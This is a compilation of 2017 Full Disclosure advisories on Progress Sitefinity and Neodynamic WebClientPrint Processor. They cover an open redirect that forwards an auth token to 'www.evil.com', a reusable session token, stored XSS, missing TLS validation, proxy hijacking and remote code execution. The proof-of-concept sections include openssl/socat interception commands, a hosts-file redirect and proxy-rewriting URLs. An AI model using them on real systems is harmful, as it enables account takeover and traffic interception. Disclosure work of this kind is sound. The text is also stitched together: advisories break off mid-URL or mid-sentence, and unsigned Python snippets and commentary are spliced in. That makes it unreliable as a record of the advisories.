[FD] SEC Consult SA-20170822-0 :: Multiple vulnerabilities in Progress Sitefinity CMS

2017-08-22 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170822-0 >
===
              title: Multiple vulnerabilities
            product: Progress Sitefinity
 vulnerable version: 9.1
      fixed version: 10.1
         CVE number: -
             impact: High
           homepage: http://www.sitefinity.com | https://www.progress.com
              found: 2016-10-21
                 by: Siddhartha Tripathy & Mingshuo Li (Office Singapore)
                     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
 https://www.sec-consult.com

===

Vendor description:
---
"Progress Sitefinity is a content management and marketing analytics
platform designed to maximize the agility needed to succeed in today’s rapidly
changing digital marketplace.
It provides developers and IT teams the tools they need to support
enterprise-level digital marketing, optimizing the customer journey by
delivering seamless personalized experiences across different technologies and
devices. Progress is a trusted source for the digital marketing innovation
needed to create transformative customer experiences that fuel business
success."

Source: http://www.sitefinity.com/about


Business recommendation:
---
SEC Consult recommends applying the provided patches by the vendor immediately.

Additionally, there are strong indications for further vulnerabilities and it
is highly suggested to perform a thorough security review by security
professionals to lower the risk of using this product.


Vulnerability overview/description:
---
1) Open Redirect Vulnerabilities
Several scripts of Sitefinity are vulnerable to an open redirect. This
vulnerability allows an attacker to redirect the victim to any site by using a
manipulated link (e.g. a manipulated link in a phishing mail, forum or a
guestbook). The redirection target could imitate the original site and might
be used for phishing attacks or for running browser exploits to infect the
victim’s machine with malware. Because the server name in the manipulated link
is identical to the original site, phishing attempts have a more trustworthy
appearance.

In the first instance of this vulnerability, the open redirect will forward
an authentication token to the attacker controlled site, which can be abused
by the attacker to initiate new sessions for the affected user.


2) Broken Session Management
During the authentication process, Sitefinity creates an authentication token
"wrap_access_token", which is further used as a GET parameter to initiate a
valid session if the supplied credentials have been verified to be correct.
Transporting this token as GET parameter causes unnecessary exposure of the
sensitive token, as it might end up in proxy or access logs.

Furthermore, this token is not tied to the session ID and can be used to
generate new valid sessions for the user, even if the initial session has been
terminated by the user. The token will also survive a password change (e.g. if
the user suspects misuse of his account) and can still be used to initiate new
sessions. During the timeframe of testing, no expiry of the token could be
observed. The wrap_access_token can thus be seen as a "Kerberos golden ticket"
for Sitefinity.


3) Permanent Cross-Site Scripting
Multiple scripts do not properly sanitize/encode user input, which leads to
permanent cross site scripting vulnerabilities. Furthermore, the web
application allows users to upload HTML files, which are provided via the same
domain, allowing an authenticated attacker to access arbitrary information and
execute arbitrary functions of Sitefinity on behalf of other users. These
vulnerabilities can be used by attackers to circumvent segregation of duties.


Proof of concept:
---
1a) Open Redirection with Access Token
On the Sitefinity login site, the "realm" parameter points the user to the
actual location once the user has authenticated successfully. The parameter
must start with the actual URL "http://www.example.com" to be accepted as a
valid destination. However, the filter can be circumvented by appending the at
symbol ("%40", @) followed by an attacker controlled host name (e.g.
"www.evil.com"). In this case, the original URL is passed to the attacker
controlled host as the username part of the URL, and the browser is sent to
the attacker's host.

Successfully authenticating with the below URL will forward the victim to the
attacker controlled host "www.evil.com".

===
http://www.example.com/Sitefinity/Authentic
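The "@" trick described above, as an added example that is not part of the SEC Consult advisory: a prefix check of the kind the advisory describes accepts "http://www.example.com@www.evil.com/...", because everything before the "@" is the userinfo component of a URL whose host is www.evil.com. The "%40" in the advisory's link is only the query-string encoding of "@"; the server decodes it before the value reaches the redirect. The trusted origin, the decoding helper and the strict check below are my assumptions for illustration; Sitefinity's own "realm" handling is not shown on this page.

```python
from urllib.parse import urlsplit, unquote

# Assumed trusted origin of the Sitefinity site (the advisory uses www.example.com).
TRUSTED = "http://www.example.com"


def realm_from_query(param: str) -> str:
    """Undo the query-string encoding: "%40" becomes "@" before the value is used."""
    return unquote(param)


def naive_realm_check(realm: str) -> bool:
    """The prefix check the advisory describes: anything starting with the site URL passes."""
    return realm.startswith(TRUSTED)


def effective_host(realm: str) -> str:
    """Host a browser actually connects to for this URL (authority parsing per RFC 3986)."""
    return urlsplit(realm).hostname or ""


def strict_realm_check(realm: str) -> bool:
    """Accept only the exact scheme and authority of the trusted origin.

    Comparing the whole netloc rejects "user@" prefixes, explicit ports and
    look-alike hosts such as www.example.com.evil.com in one go.
    """
    trusted, given = urlsplit(TRUSTED), urlsplit(realm)
    return (
        given.scheme == trusted.scheme
        and given.netloc == trusted.netloc
        and given.username is None
        and given.password is None
    )


if __name__ == "__main__":
    # Constructed sample: the advisory's payload as it arrives in the query string.
    evil = realm_from_query("http://www.example.com%40www.evil.com/Sitefinity/")
    print(evil, naive_realm_check(evil), effective_host(evil), strict_realm_check(evil))
```

The safer design is not to accept an absolute URL at all: take a path, validate that it starts with a single "/", and prepend the site's own origin server-side. That also keeps the "wrap_access_token" from ever being appended to a foreign host's URL.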

[FD] [RT-SA-2015-011] WebClientPrint Processor 2.0: No Validation of TLS Certificates

2017-08-22 Thread RedTeam Pentesting GmbH
Advisory: WebClientPrint Processor 2.0: No Validation of TLS Certificates

RedTeam Pentesting discovered that WebClientPrint Processor (WCPP) does
not validate TLS certificates when initiating HTTPS connections. Thus, a
man-in-the-middle attacker may intercept and/or modify HTTPS traffic in
transit. This may result in a disclosure of sensitive information and
the integrity of printed documents cannot be guaranteed.


Details
===

Product: Neodynamic WebClientPrint Processor
Affected Versions: 2.0.15.109 (Microsoft Windows)
Fixed Versions: >= 2.0.15.910
Vulnerability Type: Improper Certificate Validation
Security Risk: medium
Vendor URL: http://www.neodynamic.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-011
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
===

Neodynamic's WebClientPrint Processor is a client-side application,
which allows server-side applications to print documents on a client's
printer without user interaction, bypassing the browser's print
functionality. The server-side application may be written in ASP.NET or
PHP while on the client-side multiple platforms and browsers are
supported.

"Send raw data, text and native commands to client printers without
showing or displaying any print dialog box!" (Neodynamic's website)


More Details
===

Upon installation under Microsoft Windows, WCPP registers itself as a
handler for the "webclientprint" URL scheme. Thus, any URL starting with
"webclientprint:" is handled by WCPP. For example, entering

webclientprint:-about

in the URL bar of a browser opens the about box of WCPP.

Neodynamic provides an online demo for test printing at the following
URL:

http://webclientprint.azurewebsites.net/

If visited via HTTPS, the WCPP component on the client-side will try to
fetch the print job via HTTPS as well.


Proof of Concept
===

To simulate a man-in-the-middle scenario, an entry similar to the
following was appended to the "hosts" file:


10.0.2.2 webclientprint.azurewebsites.net


On the host 10.0.2.2, a self-signed certificate can be generated and
afterwards socat[1] can be used to intercept and display the encrypted
HTTP traffic as follows:


$ openssl genrsa -out server.key 4096
$ openssl dhparam -out dhparam.pem 1024
$ openssl req -new -x509 -key server.key -out server.pem -days 365 \
-subj /CN=webclientprint.azurewebsites.net
$ cat server.key >> server.pem
$ cat dhparam.pem >> server.pem
$ sudo socat -v openssl-listen:443,reuseaddr,verify=0,fork,\
cert=server.pem openssl-connect:webclientprint.azurewebsites.net:443,\
verify=0


The demo website is available via HTTPS using the following URL:

https://webclientprint.azurewebsites.net/

Any modern browser displays a warning due to the invalid TLS certificate
presented by socat.

In contrast, WCPP simply accepts any certificate it is presented with, for
example when printing a demo TXT file. Such a request is given in the
listing below. The output has been shortened and wrapped manually for
better readability.


GET /DemoPrintFile.ashx?clientPrint=undefined&
printerName=null=TXT HTTP/1.0\r
Host: webclientprint.azurewebsites.net\r
User-Agent: WCPP/2.0.15.109(Windows; 6.1)\r
Accept-Encoding: gzip, deflate\r
\r
< 2015/09/07 10:29:27.478913  length=3538 from=0 to=3537
HTTP/1.1 200 OK\r
Cache-Control: private\r
Content-Length: 3180\r
Content-Type: application/octet-stream\r
Server: Microsoft-IIS/8.0\r
X-AspNet-Version: 4.0.30319\r
X-Powered-By: ASP.NET\r
Set-Cookie: ARRAffinity=23c01e1a9de38f884445e396de9940aef5941b9af3f6d9
cfa57066fe4d5fcb16;Path=/;Domain=webclientprint.azurewebsites.net\r
Date: Mon, 07 Sep 2015 08:29:27 GMT\r
Connection: close\r
\r
cpj..\v...\v..wcpPF:9c8d5316ffeb403d8be09565c2391f92.TXT|Printed By
WebClientPrint\r
=\r
\r
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce urna
massa, eleifend non posuere quis, iaculis et libero. Curabitur lacinia
dolor non nisl pharetra tempus.
[...]
Etiam nisl nisi, eleifend vel molestie tincidunt, porttitor ac nunc.
Vestibulum vulputate magna gravida neque imperdiet ac viverra nulla
suscipit..Acopian Technical Company - 1 WebApp Lic - 2 WebServer
Lic|x


This shows that WCPP does not verify TLS certificates when establishing
HTTPS connections.


Workaround
===

Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as 

[FD] [RT-SA-2015-010] WebClientPrint Processor 2.0: Unauthorised Proxy Modification

2017-08-22 Thread RedTeam Pentesting GmbH
Advisory: WebClientPrint Processor 2.0: Unauthorised Proxy Modification

RedTeam Pentesting discovered that attackers can configure a proxy host
and port to be used when fetching print jobs with WebClientPrint
Processor (WCPP). This proxy setting may be distributed via specially
crafted websites and is set without any user interaction as soon as the
website is accessed.


Details
===

Product: Neodynamic WebClientPrint Processor
Affected Versions: 2.0.15.109 (Microsoft Windows)
Fixed Versions: >= 2.0.15.910
Vulnerability Type: Man-in-the-Middle
Security Risk: medium
Vendor URL: http://www.neodynamic.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-010
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
===

Neodynamic's WebClientPrint Processor is a client-side application,
which allows server-side applications to print documents on a client's
printer without user interaction, bypassing the browser's print
functionality. The server-side application may be written in ASP.NET or
PHP while on the client-side multiple platforms and browsers are
supported.

"Send raw data, text and native commands to client printers without
showing or displaying any print dialog box!" (Neodynamic's website)


More Details
===

Upon installation under Microsoft Windows, WCPP registers itself as a
handler for the "webclientprint" URL scheme. Thus, any URL starting with
"webclientprint:" is handled by WCPP. For example, entering

webclientprint:-about

in the URL bar of a browser opens the about box of WCPP.

During RedTeam Pentesting's analysis of WCPP it was determined that WCPP
ignores the system proxy configuration and by default tries to fetch
print jobs directly, bypassing a proxy potentially configured in the
system. WCPP can however be configured to use a (possibly different)
proxy through "webclientprint" URLs. For example, visiting the following
URL will set 192.0.2.1 as a proxy IP for WCPP:

webclientprint:-proxyHost:192.0.2.1

Likewise, the port of the proxy can be changed to 14141 through this
URL:

webclientprint:-proxyPort:14141

As soon as a proxy is initially configured, it will be used permanently
without the need for any further confirmation. If a proxy was already
configured before the URLs above are invoked, the old proxy will be
replaced by the new one.


Proof of Concept
===

An attacker may prepare a malicious website with the following content:










When visited by a WCPP user, the proxy host will be rewritten without any
user interaction and without any visual indication.

Likewise, the following HTML code may be used to define another proxy
port when visited:










This allows the proxy configuration to be changed without authorisation.


Workaround
===

Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as possible.


Fix
===

Install a WCPP version greater or equal to 2.0.15.910[0].


Security Risk
===

If print jobs are fetched by WCPP over unencrypted HTTP, the
unauthorised change of the proxy configuration may be exploited to yield
a man-in-the-middle position. Attackers only need to trick users into
visiting an attacker-controlled website which contains the configuration
URLs as outlined above. Afterwards, all jobs printed via WCPP and
fetched over HTTP will be requested through the proxy. This may lead to
a disclosure of sensitive information depending on the printed
documents. Furthermore, the integrity of the printed documents cannot be
guaranteed anymore as attackers may also change the documents in
transit.

If print jobs are fetched by WCPP over encrypted HTTPS, the unauthorised
change of the proxy configuration results in a denial of service. After
establishing a connection to the proxy, neither an HTTP request nor a
TLS ClientHello is sent. The exact cause was not investigated any
further.

Overall, this vulnerability is rated as a medium risk. This estimation
may need to be adapted depending on the protocol that is used to fetch
print jobs.


Timeline
===

2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
   clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory 

[FD] [RT-SA-2015-008] WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs

2017-08-22 Thread RedTeam Pentesting GmbH
Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs

RedTeam Pentesting discovered that malicious print jobs can be used to
trigger a remote code execution vulnerability in WebClientPrint
Processor (WCPP). These print jobs may be distributed via specially
crafted websites and are processed without any user interaction as soon
as the website is accessed.

Details
===

Product: Neodynamic WebClientPrint Processor
Affected Versions: 2.0.15.109 (Microsoft Windows)
Fixed Versions: >= 2.0.15.910
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: http://www.neodynamic.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
===

Neodynamic's WebClientPrint Processor is a client-side application which
allows server-side applications to print documents on a client's printer
without user interaction, bypassing the browser's print functionality.
The server-side application may be written in ASP.NET or PHP while on
the client-side multiple platforms and browsers are supported.

"Send raw data, text and native commands to client printers without
showing or displaying any print dialog box!" (Neodynamic's website)


More Details
===

Upon installation under Microsoft Windows, WCPP registers itself as a
handler for the "webclientprint" URL scheme. Thus, any URL starting with
"webclientprint:" is handled by WCPP. For example, entering

webclientprint:-about

in the URL bar of a browser opens the about box of WCPP.

In order to automatically print a text file using WCPP, a URL such as
the following is requested (e.g. via JavaScript code or an iframe HTML
tag in a website):

webclientprint:https://example.com/somedir/lorem.txt

The file lorem.txt conforms to Neodynamic's proprietary file format CPJ
and contains the following data:

---
$ xxd lorem.txt
00000000: 6370 6a02 fc0b 0000 070c 0000 7763 7050  cpj.........wcpP
0010: 463a 6632 3330 6262 3766 3965 3338 3437  F:f230bb7f9e3847
0020: 3633 6132 3765 6663 3565 6237 6633 6436  63a27efc5eb7f3d6
0030: 6661 2e54 5854 7c50 7269 6e74 6564 2042  fa.TXT|Printed B
0040: 7920 5765 6243 6c69 656e 7450 7269 6e74  y WebClientPrint
0050: 0d0a 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d  ..==============
0060: 3d3d 3d3d 3d3d 3d3d 3d3d 3d0d 0a0d 0a4c  ===========....L
0070: 6f72 656d 2069 7073 756d 2064 6f6c 6f72  orem ipsum dolor
0080: 2073 6974 2061 6d65 742c 2063 6f6e 7365   sit amet, conse
0090: 6374 6574 7572 2061 6469 7069 7363 696e  ctetur adipiscin
00a0: 6720 656c 6974 2e20 4675 7363 6520 7572  g elit. Fusce ur
[...]
0bc0: 6275 6c75 6d20 7675 6c70 7574 6174 6520  bulum vulputate
0bd0: 6d61 676e 6120 6772 6176 6964 6120 6e65  magna gravida ne
0be0: 7175 6520 696d 7065 7264 6965 7420 6163  que imperdiet ac
0bf0: 2076 6976 6572 7261 206e 756c 6c61 2073   viverra nulla s
0c00: 7573 6369 7069 742e 0150 4446 4372 6561  uscipit..PDFCrea
0c10: 746f 7241 636f 7069 616e 2054 6563 686e  torAcopian Techn
0c20: 6963 616c 2043 6f6d 7061 6e79 202d 2031  ical Company - 1
0c30: 2057 6562 4170 7020 4c69 6320 2d20 3220   WebApp Lic - 2
0c40: 5765 6253 6572 7665 7220 4c69 637c   WebServer Lic|xx
0c50:          
0c60:          
0c70:      xx
---

It was obtained from Neodynamic's online demo website[0]. Briefly, its
structure can be described as follows:

Offset    Size  Usage
---
   0x00      3  magic bytes "cpj"
   0x03      1  unknown
   0x04      4  offset "pc" (32 bit LE) for printer configuration
   0x08      4  offset "lk" (32 bit LE) for license key
   0x0c      6  filename/content header "wcpPF:"
   0x12      -  filename and content separated by pipe ("|") character
pc+0x12      -  printer configuration
lk+0x12      -  license key

In the example above, the file "f230bb7f9e384763a27efc5eb7f3d6fa.TXT"
would be printed on the printer with the name "PDFCreator". The license
key at the end of the file was intentionally redacted. Checking the two
header offsets against the dump places both sections at pc + 0x0c and
lk + 0x0c rather than +0x12: 0x0bfc + 0x0c = 0x0c08 is the 0x01 byte that
precedes "PDFCreator", and 0x0c07 + 0x0c = 0x0c13 is the "A" of "Acopian",
so the offsets are relative to the start of the "wcpPF:" tag. Prior to
printing, the text file with the dummy content is created in the current
user's %TEMP% directory. Typically, this directory is located at:

C:\Users\\AppData\Local\Temp\
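A parser for the CPJ layout described above, as an added example that is not RedTeam Pentesting's code: it validates the magic and the "wcpPF:" tag, bounds-checks the two section offsets before slicing (they come from the job, i.e. from whoever serves the file) and splits out filename, content, printer configuration and license key. It uses 0x0c, the start of the "wcpPF:" tag, as the base for pc and lk, because that is what the advisory's own hexdump gives (0x0bfc + 0x0c = 0x0c08 is the 0x01 byte before "PDFCreator", 0x0c07 + 0x0c = 0x0c13 is the start of "Acopian"), whereas the table says +0x12. The sample job is constructed here from the filename and printer name shown in the dump; its content and license key are placeholders. The filename check at the end is a generic hardening idea of mine, prompted by the file being written to %TEMP%, and not something the advisory states.

```python
import struct

MAGIC = b"cpj"
TAG = b"wcpPF:"
TAG_OFFSET = 0x0c                      # "wcpPF:" follows the 12-byte header
DATA_OFFSET = TAG_OFFSET + len(TAG)    # 0x12: "filename|content" starts here
# pc/lk are relative to the tag start; this matches the advisory's hexdump
# (0x0bfc + 0x0c = 0x0c08, the byte before "PDFCreator").
SECTION_BASE = TAG_OFFSET


class CpjError(ValueError):
    """Raised for a job that does not fit the described layout."""


def header_offsets(data: bytes):
    """Validate magic and tag, return the raw (pc, lk) 32-bit LE offsets."""
    if len(data) < DATA_OFFSET:
        raise CpjError("file too short for a CPJ header")
    if data[:3] != MAGIC:
        raise CpjError("bad magic, expected b'cpj'")
    if data[TAG_OFFSET:DATA_OFFSET] != TAG:
        raise CpjError("missing wcpPF: tag")
    pc, lk = struct.unpack_from("<II", data, 4)
    return pc, lk


def parse_cpj(data: bytes) -> dict:
    """Split a CPJ job into its sections, refusing offsets that leave the file."""
    pc, lk = header_offsets(data)
    pc_abs, lk_abs = pc + SECTION_BASE, lk + SECTION_BASE
    # Both offsets are attacker-controlled: require 0x12 <= pc <= lk <= EOF.
    if not (DATA_OFFSET <= pc_abs <= lk_abs <= len(data)):
        raise CpjError(f"section offsets out of range: pc={pc:#x} lk={lk:#x} size={len(data):#x}")
    payload = data[DATA_OFFSET:pc_abs]
    filename, sep, content = payload.partition(b"|")
    if not sep:
        raise CpjError("no '|' between filename and content")
    return {
        "unknown": data[3],
        "filename": filename,
        "content": content,
        "printer_config": data[pc_abs:lk_abs],
        "license_key": data[lk_abs:],
    }


def build_cpj(filename: bytes, content: bytes, printer_config: bytes,
              license_key: bytes, unknown: int = 0x02) -> bytes:
    """Assemble a job with the same layout (used here to construct test input)."""
    payload = filename + b"|" + content
    pc = len(TAG) + len(payload)           # relative to SECTION_BASE
    lk = pc + len(printer_config)
    return (MAGIC + bytes([unknown]) + struct.pack("<II", pc, lk)
            + TAG + payload + printer_config + license_key)


def rejects(data: bytes) -> bool:
    """True if parse_cpj refuses the input (used to check the bounds logic)."""
    try:
        parse_cpj(data)
    except CpjError:
        return True
    return False


def filename_escapes_temp(filename: bytes) -> bool:
    """Assumed check: flag a job filename that would not stay inside %TEMP%."""
    name = filename.decode("latin-1")
    return name in ("", ".", "..") or any(c in name for c in "\\/:\x00")


# Constructed sample: filename and printer name as in the advisory's dump,
# content and license key are placeholders.
SAMPLE = build_cpj(
    b"f230bb7f9e384763a27efc5eb7f3d6fa.TXT",
    b"Printed By WebClientPrint\r\n" + b"=" * 25 + b"\r\n\r\nLorem ipsum dolor sit amet.",
    b"\x01PDFCreator",
    b"<license key redacted>",
)

if __name__ == "__main__":
    for key, value in parse_cpj(SAMPLE).items():
        print(f"{key:15} {value!r}")
```

Because the two offsets and the filename are the only structure in the format, a job that is not from the server you expect is cheap to sanity-check before anything is written to disk: reject out-of-range offsets, and reject a filename containing a path separator or drive colon.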


Proof of Concept
===

During RedTeam